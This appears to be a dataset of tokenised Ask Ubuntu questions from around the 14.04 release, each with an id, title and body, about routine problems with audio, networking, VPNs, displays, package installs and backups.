462783	how to search in another language than the system language ?	my ubuntu system is installed with the italian language so , when i search with the dash , i obtain the results from the italian version of wikipedia . but let 's say i need more information on my topic , and i know that the english version of wikipedia is more comprehensive . how can i obtain from the dash the results from the english wikipedia instead of the italian one ?
462784	is a dvd+r , that also has `` rw '' printed on it , re-usable ?	about the dvd : dvd+r is printed on the disk , as well as - separately ( ! ) - rw i burned the 14.04 lts *.iso on to that dvd in win7 , following standard procedure as listed on ubuntu.com should this dvd still be re-usable to burn other things on it ? if so , how much of the original 4.7gb space should still be available for re-use ?
462785	apache http on ubuntuserver 13.10 . no permissions to enter site from another computer	i 've installed apache , php5 , mysql and phpmyadmin on my 13.10 server . created folder /public_html and a file index.php in there like tutorial i read said . i gave chmods for these ( folder and .php file ) . tutorial now says to check if it works so i do . i write http : //ip_address/ in my explorer and it gives smth nice to see : it works ! this is the default web page for this server . the web server software is running but no content has been added , yet . then i try http : //ip_address/~ubuntuusername and the view ai n't nice anymore : forbidden you do n't have permission to access /~ubuntuusername on this server . what can cause this ? i used polish tutorial http : //www.ubuntu-pomoc.org/instalacja-apache-php5-mysql/ but instead of gedit used vi ( i do n't think it changes anything ) .
462788	toshiba tecra a8 without audio with ubuntu 14.04 bug alsa	i ca n't hear nothing , but sometime it had worked . uname -a linux pcifp26 3.13.0-24-generic # 47-ubuntu smp fri may 2 23:31:42 utc 2014 i686 i686 i686 gnu/linux aplay -l **** lista de playback dispositivos hardware **** tarjeta 0 : intel [ hda intel ] , dispositivo 0 : alc262 analog [ alc262 analog ] subdispositivos : 0/1 subdispositivo # 0 : subdevice # 0 tarjeta 0 : intel [ hda intel ] , dispositivo 6 : si3054 modem [ si3054 modem ] subdispositivos : 1/1 subdispositivo # 0 : subdevice # 0 head -n 1 /proc/asound/card*/codec # * == > /proc/asound/card0/codec # 0 < == codec : realtek alc262 == > /proc/asound/card0/codec # 1 < == codec : lsi si3054 alsa-base.conf file # autoloader aliases install sound-slot-0 /sbin/modprobe snd-card-0 install sound-slot-1 /sbin/modprobe snd-card-1 install sound-slot-2 /sbin/modprobe snd-card-2 install sound-slot-3 /sbin/modprobe snd-card-3 install sound-slot-4 /sbin/modprobe snd-card-4 install sound-slot-5 /sbin/modprobe snd-card-5 install sound-slot-6 /sbin/modprobe snd-card-6 install sound-slot-7 /sbin/modprobe snd-card-7 # cause optional modules to be loaded above generic modules install snd /sbin/modprobe -- ignore-install snd $ cmdline_opts & & { /sbin/modprobe -- quiet -- use-blacklist snd-ioctl32 ; /sbin/modprobe -- quiet -- use-blacklist snd-seq ; } # # workaround at bug # 499695 ( reverted in ubuntu see lp # 319505 ) install snd-pcm /sbin/modprobe -- ignore-install snd-pcm $ cmdline_opts & & { /sbin/modprobe -- quiet -- use-blacklist snd-pcm-oss ; : ; } install snd-mixer /sbin/modprobe -- ignore-install snd-mixer $ cmdline_opts & & { /sbin/modprobe -- quiet -- use-blacklist snd-mixer-oss ; : ; } install snd-seq /sbin/modprobe -- ignore-install snd-seq $ cmdline_opts & & { /sbin/modprobe -- quiet -- use-blacklist snd-seq-midi ; /sbin/modprobe -- quiet -- use-blacklist snd-seq-oss ; : ; } # install snd-rawmidi /sbin/modprobe -- ignore-install snd-rawmidi $ cmdline_opts & & { /sbin/modprobe -- quiet -- use-blacklist snd-seq-midi ; : ; } # cause optional modules to be loaded above sound card driver modules install snd-emu10k1 /sbin/modprobe -- ignore-install snd-emu10k1 $ cmdline_opts & & { /sbin/modprobe -- quiet -- use-blacklist snd-emu10k1-synth ; } install snd-via82xx /sbin/modprobe -- ignore-install snd-via82xx $ cmdline_opts & & { /sbin/modprobe -- quiet -- use-blacklist snd-seq ; } # load saa7134-alsa instead of saa7134 ( which gets dragged in by it anyway ) install saa7134 /sbin/modprobe -- ignore-install saa7134 $ cmdline_opts & & { /sbin/modprobe -- quiet -- use-blacklist saa7134-alsa ; : ; } # prevent abnormal drivers from grabbing index 0 options bt87x index=-2 options cx88_alsa index=-2 options saa7134-alsa index=-2 options snd-atiixp-modem index=-2 options snd-intel8x0m index=-2 options snd-via82xx-modem index=-2 options snd-usb-audio index=-2 options snd-usb-caiaq index=-2 options snd-usb-ua101 index=-2 options snd-usb-us122l index=-2 options snd-usb-usx2y index=-2 # ubuntu # 62691 , enable mpu for snd-cmipci options snd-cmipci mpu_port=0x330 fm_port=0x388 # keep snd-pcsp from being loaded as first soundcard options snd-pcsp index=-2 # keep snd-usb-audio from beeing loaded as first soundcard options snd-usb-audio index=-2 any ideas , of what it can be .
462792	backup and restoration of usb-modem functionality	the laptop with usb modem is in another city with my elder relative . the laptop has dual boot with xp and ubuntu . modem works in xp . the modem did work in ubuntu but not anymore . i can not fix the problem remotely . when i visit her i will fix it . after that , i need a way to backup the functionality of the modem and more importantly , an easy way to restore it . so easy that 65 years old non-geek lady can do it with me helping over the phone . update : now the system works , but i still do not have a way to easily ( backup and ) restore the networking in a case of failure .
462793	pcmanfm right click context menu create directory unresponsive	enough of the recent changes in gnome i decided to find a solid yet reliable file manager . i found pcmanfm , it 's fast , reliable and not buggy but i met a bug i think . i added pcmanfm -- desktop to startup lists and it 's handling to draw desktop . when i want to create directory or file on desktop using right click context menu in desktop , it remains unresponsive , not always . it happens especially at login , and once it works , it keeps working afterwards . edit : it runs pretty well in a folder , i think it 's restricted to only desktop . edit2 : no , it does n't make any difference , it 's unresponsive either on desktop or in a folder .
462794	how to conveniently install cx_freeze for python 3 ?	i want to install cx_freeze for python 3 . my ubuntu 14.04 has python 2.7 and python 3.4 . for python 2 i could install cx_freeze very conveniently using : sudo apt install cx-freeze however this only installs cx-freeze for python 2 not for python 3 . also the officialy cx_freeze website does not contain installation hints . i 'm not very firm in building software from scratch . i also tried pip3 ( version 1.5.5 ) but to no avail : pip3 install cx-freeze could not find any downloads that satisfy the requirement therefore the question ( s ) : is there a simple ( one line ) way to install cx_freeze for python 3 ? if not , can someone guide me step by step through the most simple alternative please ? edit : following the answer by dumindu mahawela i got the following output : selecting previously unselected package cx-freeze-python3 . ( reading database ... 163736 files and directories currently installed . ) preparing to unpack cx-freeze-python3_4.3-0ubuntu0px0pre2_amd64.deb ... unpacking cx-freeze-python3 ( 4.3-0ubuntu0px0pre2 ) ... dpkg : dependency problems prevent configuration of cx-freeze-python3 : cx-freeze-python3 depends on libpython3.2 ( > = 3.2~a4 ) ; however : package libpython3.2 is not installed . cx-freeze-python3 depends on python3 ( < < 3.3 ) ; however : version of python3 on system is 3.4.0-0ubuntu2 . cx-freeze-python3 depends on python3.2 ; however : package python3.2 is not installed . cx-freeze-python3 depends on cx-freeze-common ; however : package cx-freeze-common is not installed . dpkg : error processing package cx-freeze-python3 ( -- install ) : dependency problems - leaving unconfigured which probably means that the linked debian package it not for recent ubuntu versions ( python3 < < 3.3 required ) . i do n't want to go back to python 3.2 for this . searching even for more complex installation advices i found nothing that did n't have some problem or another . it might be that cx_freeze is currently not very well supporting python versions > = 3.3 on ubuntu . if that 's the case i would just move on and try something different . thanks for all efforts to help !
462795	byobu - what do the numbers mean ?	on ubuntu 14.04 lts , when running byobu , i keep seeing strange numbers appear , such as 127 in the screenshot below : what does this 127 represent , and if it is nothing important , how do i get rid of it ? i do n't remember seeing this in ubuntu 12.04 .
462800	using interfaces file - device is not maintained	i need to set ethtool command at start-up because my router refuse to communicate until i set my lan card to full duplex mode . i know how to do that using ethtool , but how to preserve changes after reboot ? i 've tried editing interfaces file : # this file describes the network interfaces available on your system # and how to activate them . for more information , see interfaces ( 5 ) . # the loopback network interface auto lo iface lo inet loopback auto eth0 iface eth0 inet dhcp pre-up /sbin/ethtool -s $ iface autoneg off speed 100 duplex full when i do /etc/init.d/networking restart everything looks fine , but gnome says the device is not maintained and i can not access internet . what i must change to be able to maintain lan card using gnome and use ethtool at boot properly ?
462802	can you use maas without pxe or wol ?	i am trying to evaluate maas using one laptop to install another . the target laptop does not have wake on lan , and does n't seem to have any of the other power types listed in the selection dialog box either . is it possible to use maas by manually switching on & rebooting the target machine ? i am using maas on 14.04 , and i am trying to install the same release .
462805	avconv set really slow frame rate	i have just a couple of images ( 20-40 ) and i want make movie which plays with frame rate 1-2 fps ( i.e . each image should be visible for 0.5-1 second ) ... so the whole movie should take ~20-40 seconds to play . it seem that video generated using avconv with option -r 1 or -r 2 does not do this job : - ( . if i generate the movie in this way : avconv -i ./relief_ % 04d.png -force_fps -r 1 -vf `` scale=320:240 '' test.avi i also tried option -force_fps it has no effect it does strange things : the movie plays just ~2 seconds ( instead of 20-40 seconds ) it does not show every images ( just 1-2 ) it is like very laggy ( and it is also a bit dependent on the player . mplayer do the strange things described above , vlc shows just black screen )
462810	how to get web-app in taskbar using url ?	i 'm really new to ubuntu and linux os , and i have been digging around trying to find the answer to my question . i want to have a shortcut to a specific url address in the unity taskbar ( the menu bar to the left ) . what i want it to be and how to work : i want to have the shortcut to âľtorrent web-app using the url , and i want it to open up in a new firefox window . pretty much how the youtube application works . is this possible to do , and if so , can i have the âľtorrent icon on my shortcut ?
462812	how to set font for gtk applications on kubuntu 14.04 ?	i am trying to use the same font in kubuntu 14.04 both for native kde apps and for gtk apps . if i use the gtk entry on system preferences to set up the font , i see the following problems : 1 : only some applications actually change the font : for example , it works on pidgin , but not on firefox or evolution . this problem with evolution is my major concern , because the default font is too big 2 : the font size works in a strange way . all fonts look bigger than on kde applications and it seems that there is a bottom limit , so i can not set small sizes
462813	package manager errors on my ubuntu	i have this issues with my ubuntu apt-get update http : //pastebin.com/embed_js.php ? i=ex18v2ku ubilli @ ubilli-pc ~ > sudo apt-get update [ sudo ] password for ubilli : ign http : //ppa.launchpad.net precise inrelease ign http : //ppa.launchpad.net precise inrelease ign http : //ppa.launchpad.net precise inrelease . . . ign http : //ppa.launchpad.net precise/main translation-en hit http : //us.archive.ubuntu.com saucy-updates/universe translation-en fetched 459 kb in 25s ( 17.7 kb/s ) reading package lists ... done w : gpg error : http : //ppa.launchpad.net precise release : the following signatures couldn\'t be verified because the public key is not available : no_pubkey d1106511179518b2 w : there is no public key available for the following key ids : 3b4fe6acc0b21f32 w : there is no public key available for the following key ids : 3b4fe6acc0b21f32
462814	lock screen not working	when trying to do something , i used the command `` service lightdm disable '' or something like that . from the moment i did that , my lockscreen is not working anymore . how do i make it working again ? should i `` enable '' lightdm ? how would i go about doing that ? i 'm using xubuntu 14.04 .
462815	update manager error - invalid package name	i get the following error when trying to perform an update in ubuntu 12.04 64bit : installarchives ( ) failed : preconfiguring packages ... preconfiguring packages ... preconfiguring packages ... preconfiguring packages ... dpkg : error : parsing file '/var/lib/dpkg/available ' near line 40128 package 'foomatic-db-compressed-ppds ' : `suggests ' field , invalid package name `printer5driver- ? 2300w ' : character ` ? ' not allowed ( only letters , digits and characters `-+._ ' ) any ideas on how to solve this ?
462819	bluetooth keyboard 14.04 problem	upgraded to ubuntu 14.04 ( from 13.1 ) and bluetooth keyboard pairs ok . however , since the upgrade most of the keys no longer function or show incorrectly . can anyone suggest a fix ? ( keyboard functions tested on alternative android device and works fine . )
462823	gpodder not downloading ted talks subtitles	i am trying to download ted talks with subtitles in gpodder without success . i use ubuntu 14.04 and gpodder 3.5.2 . i made test subscriptions in ted hd talks ( http : //feeds.feedburner.com/tedtalkshd/ ) and regular talks ( http : //feeds.feedburner.com/tedtalks_video ) . it works well for video , but without downloading subtitles . in tools-preferences-extensions , ted talks subtitles downloader is active . how can i make it work ?
462827	live data stream from logitech webcam c110	i wanted to stream live data of my logitech c110 webcam using my ubuntu machine . how can i do this ? after little bit of tweaking i came to know that i have to install motion . i tried sudo apt-get install motion but that is not working . can anyone please tell me how to do this ? my ubuntu is behind a proxy ( it is in the office ) .
462832	how to delete swap space to recover windows ?	i want to dual boot my system with windows 7 . so i shrink my c : drive in 30 gb with fat32 file system . i had other two partition 99 gb and 285 gb both are in ntfs . then i rebooted my computer by ubuntu live usb and i saw 4 partitions where sda4 is only the partition which is fat32 . i selected it as a linux-swap . now when swap area were creating i noticed that there is only 4 partitions rather than 5 . actually it was 295 gb but it was in mb thats why i missed . immediately i turn my pc off and reboot it and windows could not load yet , system repair says unknown file format . i run live ubuntu usb again for checking my data ... there i saw all partitions except 30gb and all data are safe . there are 3 partition c ( 70.3gb ) , d ( 99gb ) , e ( 285gb ) . data that are in e are also accessible . i open terminal execute sudo fdisk -l command and the output are different from sudo lsblk -o name , fstype , size , mountpoint , label . fdisk command shows which i exact shown in gparted and in the time of installation but lsblk shows the expected result i.e sda3 is 30 gb and its file system is swap , sda4 is 265gb and file system is ntfs . i cant able to format this swap space with gparted or fdisk because it shows 265+35 gb . i dont understand ... please help me..
462836	how to used windows free hd space in ubuntu ?	i have install ubuntu . and my hd size is 360 gb . i have used 250 gb hd for windows and 110 gb for ubuntu . my space for ubuntu is full . but i have 100 gb free space in windows . i want to use that space for ubuntu . is it possible or not ? or should i have to reinstall ubuntu new with hd partition . but i do n't think this is good idea ? i do n't want loss my data of ubuntu .
462837	i want to install closure compiler on ubuntu but do n't know how to include new packages in ubuntu	i want to include new universe saucy packages , but i do n't know how to do this . please help me out .
462841	how to install and use jedi-vim python ide for vim on ubuntu	how to install jedi-vim python plugin on vim installed on ubuntu and use it 's features from remote terminal window . i have gone through documentation as describe but my vim acts in the same normal was as it was before ! i tryied cd ~/.vim/bundle git clone git : //github.com/davidhalter/jedi-vim.git
462845	display application and turning off a laptop monitor	i use ubuntu 12.04 on a fujitsu laptop . the screen often becomes dark , so i added an external philips monitor . i chose mirror displays : unchecked and off for the laptop 's screen in displays application . when i turn laptop on , both screens turn on , at a low resolution , same for both . after i typped the password and ubuntu starts , the laptop 's screen turns off and the external screen changes its resolution to the optimal one . how can i completely stop the laptop 's screen to turn on and make only the external monitor to turn on directly to the optimal resolution ?
462851	xubuntu 14.04 lts - poor sound quality on battery	the audio only works in high quality when i boot linux with the charger plugged in . when i boot it only on battery it lost audio quality . i have already enabled 'lfe-remixing ' , setted channels to 6 and specified them in pulseaudio files , but the problem still . how can i set the audio quality to high , regardless of anything ?
462857	how to configure webodf on ubuntu 12.04 ?	i want to know that how to configure webodf on ubuntu 12.04 , but i ca n't find any help from their website . can anyone help me with this ?
462858	stopping screen from going black after lock on ubuntu 14.04	in ubuntu 14.04 when i lock my screen it shows my login screen and the background is wisabe , but after couple of seconds the screen goes black . how can i stop ubuntu from doing that so that i would see my login screen until i log back in ?
462859	pptp vpn connection failed 14.04 mppe required , but kernel has no support	i have installed chrubuntu trusty 14.04 amd64 over acer c710 chromebook . everything is ok so far including openconnect and vpn all connected ok . the problem is i can not get pptp vpn connection work . the same destination works for ubuntu 12.04 , windows 7 wireless and wired.i have copied the log and compare between 12.04 and 14.04 . my pptp client configuration is the same in both machine . after the chap authentication succeeded in both case . i have these two lines error in 14.04 but 128-bit compression used in 12.04 may 8 22:26:52 acerc710a pppd [ 4811 ] : kernel does not support ppp filtering may 8 22:26:52 acerc710a pppd [ 4811 ] : mppe required , but kernel has no support . **12.04 /var/log/syslog : ( connection success ) ** may 8 22:30:58 lai-desktop pptp [ 2631 ] : nm-pptp-service-2614 warn [ ctrlp_disp : pptp_ctrl.c:956 ] : non-zero async control character maps are not supported ! may 8 22:30:58 lai-desktop pppd [ 2619 ] : chap authentication succeeded may 8 22:30:58 lai-desktop kernel : [ 138.248931 ] ppp mppe compression module registered may 8 22:30:58 lai-desktop pppd [ 2619 ] : mppe 128-bit stateless compression enabled ... ... ... ... **14.04 /var/log/syslog : ( connection failed ) ** may 8 22:26:50 acerc710a pptp [ 4827 ] : nm-pptp-service-4810 log [ ctrlp_disp : pptp_ctrl.c:739 ] : received start control connection reply may 8 22:26:50 acerc710a pptp [ 4827 ] : nm-pptp-service-4810 log [ ctrlp_disp : pptp_ctrl.c:773 ] : client connection established . may 8 22:26:51 acerc710a pptp [ 4827 ] : nm-pptp-service-4810 log [ ctrlp_rep : pptp_ctrl.c:251 ] : sent control packet type is 7 'outgoing-call-request' may 8 22:26:51 acerc710a pptp [ 4827 ] : nm-pptp-service-4810 log [ ctrlp_disp : pptp_ctrl.c:858 ] : received outgoing call reply . may 8 22:26:51 acerc710a pptp [ 4827 ] : nm-pptp-service-4810 log [ ctrlp_disp : pptp_ctrl.c:897 ] : outgoing call established ( call id 0 , peer 's call id 950 ) . may 8 22:26:52 acerc710a pptp [ 4827 ] : nm-pptp-service-4810 log [ ctrlp_disp : pptp_ctrl.c:950 ] : pptp_set_link_info received from peer_callid 0 may 8 22:26:52 acerc710a pptp [ 4827 ] : nm-pptp-service-4810 log [ ctrlp_disp : pptp_ctrl.c:953 ] : send_accm is 00000000 , recv_accm is ffffffff may 8 22:26:52 acerc710a pptp [ 4827 ] : nm-pptp-service-4810 warn [ ctrlp_disp : pptp_ctrl.c:956 ] : non-zero async control character maps are not supported ! may 8 22:26:52 acerc710a pppd [ 4811 ] : chap authentication succeeded **may 8 22:26:52 acerc710a pppd [ 4811 ] : kernel does not support ppp filtering** **may 8 22:26:52 acerc710a pppd [ 4811 ] : mppe required , but kernel has no support . ** may 8 22:26:52 acerc710a pptp [ 4827 ] : nm-pptp-service-4810 log [ ctrlp_disp : pptp_ctrl.c:950 ] : pptp_set_link_info received from peer_callid 0 may 8 22:26:52 acerc710a pptp [ 4827 ] : nm-pptp-service-4810 log [ ctrlp_disp : pptp_ctrl.c:953 ] : send_accm is ffffffff , recv_accm is ffffffff may 8 22:26:52 acerc710a pptp [ 4827 ] : nm-pptp-service-4810 warn [ ctrlp_disp : pptp_ctrl.c:956 ] : non-zero async control character maps are not supported ! may 8 22:26:52 acerc710a pppd [ 4811 ] : connection terminated . may 8 22:26:52 acerc710a networkmanager [ 537 ] : < warn > vpn plugin failed : 1 may 8 22:26:52 acerc710a networkmanager [ 537 ] : scplugin-ifupdown : devices removed ( path : /sys/devices/virtual/net/ppp0 , iface : ppp0 ) may 8 22:26:52 acerc710a pptp [ 4814 ] : nm-pptp-service-4810 warn [ decaps_hdlc : pptp_gre.c:204 ] : short read ( -1 ) : input/output error may 8 22:26:52 acerc710a pptp [ 4814 ] : nm-pptp-service-4810 warn [ decaps_hdlc : pptp_gre.c:216 ] : pppd may have shutdown , see pppd log may 8 22:26:52 acerc710a pptp [ 4827 ] : nm-pptp-service-4810 log [ callmgr_main : pptp_callmgr.c:234 ] : closing connection ( unhandled ) may 8 22:26:52 acerc710a pptp [ 4827 ] : nm-pptp-service-4810 log [ ctrlp_rep : pptp_ctrl.c:251 ] : sent control packet type is 12 'call-clear-request' may 8 22:26:52 acerc710a pptp [ 4827 ] : nm-pptp-service-4810 log [ call_callback : pptp_callmgr.c:79 ] : closing connection ( call state ) may 8 22:26:52 acerc710a networkmanager [ 537 ] : < warn > vpn plugin failed : 1 may 8 22:26:52 acerc710a pppd [ 4811 ] : exit . may 8 22:26:52 acerc710a networkmanager [ 537 ] : < info > vpn plugin state changed : stopped ( 6 ) may 8 22:26:52 acerc710a networkmanager [ 537 ] : < info > vpn plugin state change reason : 0 may 8 22:26:52 acerc710a networkmanager [ 537 ] : < info > policy set 'lai_wireless_05 ' ( wlan0 ) as default for ipv4 routing and dns . may 8 22:26:52 acerc710a networkmanager [ 537 ] : < warn > error disconnecting vpn : could not process the request because no vpn connection was active . may 8 22:26:56 acerc710a dbus [ 230 ] : [ system ] activating service name='org.freedesktop.hostname1 ' ( using servicehelper ) may 8 22:26:56 acerc710a dbus [ 230 ] : [ system ] successfully activated service 'org.freedesktop.hostname1' may 8 22:26:57 acerc710a networkmanager [ 537 ] : < info > vpn service 'pptp ' disappeared may 8 22:36:12 acerc710a aptdaemon : info : quitting due to inactivity may 8 22:36:12 acerc710a aptdaemon : info : quitting was requested can anyone help please ? i am a newbie.. thank you in advance ...
462860	14.04 always asks for password for a network drive ( sftp )	i just upgraded from 12.04 to 14.04 . when i connect to a sftp site it always ( after rebooting ) prompt me for username and password , even though i click the option to store them forever ( it worked well on 12.04 ) . thanks .
462862	accessing windows server share on ubuntu 12.04 via fstab	i want to give a ubuntu 12.04 user access to the shared folder of windows servers . i made the these changes to the /etc/fstab //192.168.1.100/share /home/user/share cifs username=dem , password=**** , iocharset=utf8 , sec=ntlm 0 0 the problem is that the user ca n't make any changes to it , despite this user has full access to this share directory on windows server . please advice
462864	xubuntu restarts automatically after shutdown	i recently installed xubuntu 14.04 on a dell workstation . whenever i shutdown , two things happen . either it shuts down and automatically restarts , or it hangs at shutdown with a black screen . searching for a solution i have tried the following : used sudo shutdown -h now , sudo shutdown -p now , sudo init 0 from terminal amended and updated /etc/default/grub to grub_cmdline_linux_default= '' quiet splash acpi=force '' checked the bios for wake on lan ( not an option for the dell precicion 7400 workstation ) reinstalled xubuntu none of these have solved the problems so far . anyone have any other options for me to try ?
462865	vagrant ubuntu hangs kernel selection	i on newbie on vagrant and have a problem . i use windows7 and virtualbox 4.2.12 vagrant work in virtual ubuntu 13.10 and ubuntu host has 1 cpu 3.5 gb memory 20 gb disk and vagrant version is 1:1.3.5 when i run vagrant init , server waits for kernel selection and nothing to do and this is vagrantfile : # -*- mode : ruby -*- # vi : set ft=ruby : # vagrantfile api/syntax version . do n't touch unless you know what you 're doing ! vagrantfile_api_version = `` 2 '' vagrant.configure ( vagrantfile_api_version ) do |config| # all vagrant configuration is done here . the most common configuration # options are documented and commented below . for a complete reference , # please see the online documentation at vagrantup.com . # every vagrant virtual environment requires a box to build off of . config.vm.box = `` precise64 '' # the url from where the 'config.vm.box ' box will be fetched if it # does n't already exist on the user 's system . config.vm.box_url = `` http : //files.vagrantup.com/precise64.box '' # create a forwarded port mapping which allows access to a specific port # within the machine from a port on the host machine . in the example below , # accessing `` localhost:8080 '' will access port 80 on the guest machine . # config.vm.network : forwarded_port , guest : 80 , host : 8080 # create a private network , which allows host-only access to the machine # using a specific ip . # config.vm.network : private_network , ip : `` 192.168.33.10 '' # create a public network , which generally matched to bridged network . # bridged networks make the machine appear as another physical device on # your network . # config.vm.network : public_network # if true , then any ssh connections made will enable agent forwarding . # default value : false # config.ssh.forward_agent = true # share an additional folder to the guest vm . the first argument is # the path on the host to the actual folder . the second argument is # the path on the guest to mount the folder . and the optional third # argument is a set of non-required options . # config.vm.synced_folder `` ../data '' , `` /vagrant_data '' # provider-specific configuration so you can fine-tune various # backing providers for vagrant . these expose provider-specific options . # example for virtualbox : # # config.vm.provider : virtualbox do |vb| # # do n't boot with headless mode # vb.gui = true # # # use vboxmanage to customize the vm . for example to change memory : # vb.customize [ `` modifyvm '' , : id , `` -- memory '' , `` 1024 '' ] # end # # view the documentation for the provider you 're using for more # information on available options . # enable provisioning with puppet stand alone . puppet manifests # are contained in a directory path relative to this vagrantfile . # you will need to create the manifests directory and a manifest in # the file precise64.pp in the manifests_path directory . # # an example puppet manifest to provision the message of the day : # # # group { `` puppet '' : # # ensure = > `` present '' , # # } # # # # file { owner = > 0 , group = > 0 , mode = > 0644 } # # # # file { '/etc/motd ' : # # content = > `` welcome to your vagrant-built virtual machine ! # # managed by puppet.\n '' # # } # # config.vm.provision : puppet do |puppet| # puppet.manifests_path = `` manifests '' # puppet.manifest_file = `` site.pp '' # end # enable provisioning with chef solo , specifying a cookbooks path , roles # path , and data_bags path ( all relative to this vagrantfile ) , and adding # some recipes and/or roles . # # config.vm.provision : chef_solo do |chef| # chef.cookbooks_path = `` ../my-recipes/cookbooks '' # chef.roles_path = `` ../my-recipes/roles '' # chef.data_bags_path = `` ../my-recipes/data_bags '' # chef.add_recipe `` mysql '' # chef.add_role `` web '' # # # you may also specify custom json attributes : # chef.json = { : mysql_password = > `` foo '' } # end # enable provisioning with chef server , specifying the chef server url , # and the path to the validation key ( relative to this vagrantfile ) . # # the opscode platform uses https . substitute your organization for # orgname in the url and validation key . # # if you have your own chef server , use the appropriate url , which may be # http instead of https depending on your configuration . also change the # validation key to validation.pem . # # config.vm.provision : chef_client do |chef| # chef.chef_server_url = `` https : //api.opscode.com/organizations/orgname '' # chef.validation_key_path = `` orgname-validator.pem '' # end # # if you 're using the opscode platform , your validator client is # orgname-validator , replacing orgname with your organization name . # # if you have your own chef server , the default validation client name is # chef-validator , unless you changed the configuration . # # chef.validation_client_name = `` orgname-validator '' config.vm.provider : virtualbox do |vb| vb.customize [ `` modifyvm '' , : id , `` -- hwvirtex '' , `` off '' ] end end
462868	correct dhcp client configuration	i have two dhcp directories in /etc : /etc/dhcp and /etc/dhcp3 which one is the correct direcotry for editing my dhcp client configuration ? i want to send the hostname with dhcp and so was trying to set the correct hostname in the dhclient.conf . but this file only exists in /etc/dhcp but not in /etc/dhcp3 .
462869	prevent gnome-3 from enabling extended desktop	i am on the latest ubuntu 14.04 with gnome-3 ( not ubuntu unity ) . in my office , i am using lenovo t410 laptop with an external monitor connected to it via docking station . what i want is to use only the external monitor whenever the laptop is attached to the docking station . i can easily achieve this manually with xrandr or with the gui tool ( displays ) . they both detect the monitor and work fine . but i want to do it automatically . i managed to do it on lightdm level . i put this into /etc/lightdm/lightdm.conf : [ seatdefaults ] display-setup-script=/usr/share/lightdmxrandr.sh and here is lightdmxrandr.sh ( here : lvds-1 is the laptop screen , dp-3 is the monitor ) : # ! /bin/bash xcom0=`xrandr -q | grep 'dp-3 connected'` if [ -n `` $ xcom0 '' ] || [ ! `` $ xcom0 '' = `` '' ] then # external monitor is connected xrandr -- output lvds-1 -- off -- output dp-3 -- primary -- auto else # external monitor is disconnected xrandr -- output lvds-1 -- primary -- auto fi exit 0 ; this works well on lightdm level , the laptop screen is disabled whenever i have my monitor attached . but when i enter my username/password , the laptop screen is suddenly enabled , extending the monitor . i ca n't figure out what enables it . looks like some default setting in gnome . how can i prevent gnome from doing this ?
462870	nautilus bookmarks list not complete on `` right click '' files on launcher	on ubuntu 14.04 ( but also on previous versions ) i 've added 24 bookmarks to nautilus , and when i right click the files icon on the launcher it is not possible to scroll all the bookmarks ( also the standard bookmarks are included ) , and i ca n't reach the first in the top . are there any settings to avoid this issue ? thanks , rik
462871	how to properly clone both root and user information with proper permissions ?	i have been looking for a backup software for my ubuntu boxes that works with the similar ease of easeus backup software for windows . i would like to be able to back up both user info and root info . i have tried the built in backup in ubuntu without much luck and the same goes for clonezilla ... thanks ! easeus is almost a one click solution for windows that backs up entire partitions even linux partitions . it does not matter if the disk is encrypted or not . ( to easeus ) the problem is that i want something that not only backs up partitions for my encrypted linux partitions plus my boot partition . i want it to install grub if need be and also be loaded to dissimilar hardware . ( i.e . you buy a bigger harddrive and need to do a restore ) my entire setup currently is gpt partitioning on sda1 i have a software raid drive that i have yet to be able to use in ubuntu although i know it is possible . ( ntfs formatted but dynamic disk formatted from windows 8.1 ) on sdb1 and 2 are special partitions required by windows 8.1 in gpt mode ( one is system and the other is some weird thing for gpt ) on sdb3 i have my windows8.1 install on sdb4 i have unallocated space for my ssd to be able to repair itself on sdb5 i have an encrypted ext 4 partition containing root , user , etc on sdb6 i have an unencrypted ext 2 partition containing boot for grub on sdb3 i have the other part of the dynamic disk for windows mirrored in software raid 0 with a total of 2tb ntfs formatted
462872	vlc does not launch after installing a new skin ( upgraded to 14.04 lts )	after upgrade to ubuntu 14.04 , vlc worked . after installing a new skin for vlc , vlc wo n't launch . the skin file was deleted . vlc was removed completely with : sudo apt-get remove -- purge vlc sudo apt-get remove -- purge vlc* sudo apt-get remove -- purge vlc-data after reinstalling with synaptic vlc does not launch . after purging vlc again , the terminal responds to : vlc with ; the program 'vlc ' is currently not installed . you can install it by typing : sudo apt-get install vlc-nox vlc was installed with sudo apt-get install vlc-nox running vlc from the terminal gives : vlc media player 2.1.2 rincewind ( revision 2.1.2-0-ga4c4876 ) [ 0x1d034c8 ] main interface error : no suitable interface module [ 0x1ce7058 ] main libvlc error : interface `` globalhotkeys , none '' initialization failed nb : in all instances vlc 2.1.2-2build2 was installed but not working . apt-get was also cleaned , after purge , sudo apt-get autoremove removed all packages that were not needed anymore . sudo apt-get clean sudo apt-get autoclean no extra ppa 's are present . how to install a regular gui version vlc ? 1 ) to answer azkerm vlc was installed with synaptic . ~ $ dpkg -- get-selections | grep `` vlc '' libvlc5 install libvlccore7 install vlc install vlc-data install vlc-nox install vlc-plugin-notify install vlc-plugin-pulse install 2 ) to answer jos : vlc -- ignore-config vlc media player 2.1.2 rincewind ( revision 2.1.2-0-ga4c4876 ) [ 0xbb7058 ] main libvlc : running vlc with the default interface . use 'cvlc ' to use vlc without interface . fontconfig warning : fcpattern object size does not accept value `` 0 '' fontconfig warning : fcpattern object size does not accept value `` 0 '' fontconfig warning : fcpattern object size does not accept value `` 0 '' fontconfig warning : fcpattern object size does not accept value `` 0 '' [ 0x7fe8113cbbb8 ] main vout display error : failed to resize display despite the warnings , vlc -- ignore-config launched a working vlc ! the old config must have been the cause of problems . vlc -- reset-config is a permanent solution . thank you for taking an interest in this question ( and for editing it ) .
462881	mobile phone tethering in ubuntu 14.04	i have a nokia c3-01.5 mobile phone i use it to get access to the internet on occasions from my laptop . i recently changed from windows xp to ubuntu 12.10 . tethering worked fine with blue tooth but i could n't get my wireless to work . i changed to version 13.10 and i could then get my wireless to work but not tethering . i have now installed and updated version 14.04 . my wireless works but i still can not get tethering to work either via blue tooth or usb cable . after pairing the phone i select the `` access the internet using your mobile phone ( dun ) option but get an error message `` error timed out detecting phone details . '' can someone please tell me how i can get dun through my phone in ubuntu 14.04 ? i looked at some answers to similar problems when i had version 13.10 installed and one suggested installing modemanager but all this did was to stop my wireless working .
462887	initrd regeneration on every installation	after upgrading to 14.04 and switching to lubuntu i noticed that almost any package installation entails initrd regeneration : $ aptitude reinstall udev ... update-initramfs : deferring update ( trigger activated ) processing triggers for initramfs-tools ( 0.103ubuntu4 ) ... update-initramfs : generating /boot/initrd.img-3.13.0-24-generic ... what is going on ?
